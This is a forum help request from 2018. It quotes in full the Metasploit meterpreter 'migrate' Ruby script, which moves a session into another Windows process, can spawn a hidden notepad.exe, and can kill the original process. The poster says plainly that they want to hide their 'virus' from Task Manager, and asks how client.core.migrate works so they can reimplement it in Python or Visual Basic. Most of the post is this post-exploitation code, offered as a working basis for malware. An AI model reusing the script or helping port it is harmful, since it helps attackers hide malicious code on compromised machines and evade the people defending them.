Meterpreter Migrate Help Pls

Jun 22, 2018 02:50 PM
Jun 22, 2018 02:51 PM

##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##

#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#

spawn = false
kill = false
target_pid = nil
target_name = nil

opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-f" => [ false, "Launch a process and migrate into the new process" ],
  "-p" => [ true , "PID to migrate to." ],
  "-k" => [ false, "Kill original process." ],
  "-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]
)

opts.parse(args) { |opt, idx, val|
  case opt
  when "-f"
    spawn = true
  when "-k"
    kill = true
  when "-p"
    target_pid = val.to_i
  when "-n"
    target_name = val.to_s
  when "-h"
    print_line(opts.usage)
    raise Rex::Script::Completed
  else
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
}

# Creates a temp notepad.exe to migrate to depending the architecture.
def create_temp_proc()
  # Use the system path for executable to run
  cmd = "notepad.exe"
  # run hidden
  proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
  return proc.pid
end

# In case no option is provided show help
if args.length == 0
  print_line(opts.usage)
  raise Rex::Script::Completed
end

### Main ###

if client.platform == 'windows'
  server = client.sys.process.open
  original_pid = server.pid
  print_status("Current server process: #{server.name} (#{server.pid})")

  if spawn
    print_status("Spawning notepad.exe process to migrate to")
    target_pid = create_temp_proc
  end

  if target_name and not target_pid
    target_pid = client.sys.process[target_name]
    if not target_pid
      print_status("Could not identify the process ID for #{target_name}")
      raise Rex::Script::Completed
    end
  end

  begin
    print_good("Migrating to #{target_pid}")
    client.core.migrate(target_pid)
    print_good("Successfully migrated to process #{target_pid}")
  rescue ::Exception => e
    print_error("Could not migrate in to process.")
    print_error(e)
  end

  if kill
    print_status("Killing original process with PID #{original_pid}")
    client.sys.process.kill(original_pid)
    print_good("Successfully killed process with PID #{original_pid}")
  end
end

— Metasploit

Language = RUBY

Friends, the code you see above is code taken from Metasploit on Linux. Most Metasploit users know that when you take a payload to the other side and listen to it, you can hide your virus from places like Task Manager with the "migrate" command, or you can show it as another program.

I've studied this code, and it's actually easy code with 96 lines. Of all the 96 lines of code, only 1 line does the actual job.

client.core.migrate(target_pid)

In the above code there is a variable named "target_pid", and this is the value of the program "PID" we want to hide. So far I have no problem with the main responsibility of how to do this in Visual Basic or Python. What actually is client.core.migrate? How do I use it in Python or Visual Basic?

Sorry, my English may be bad.
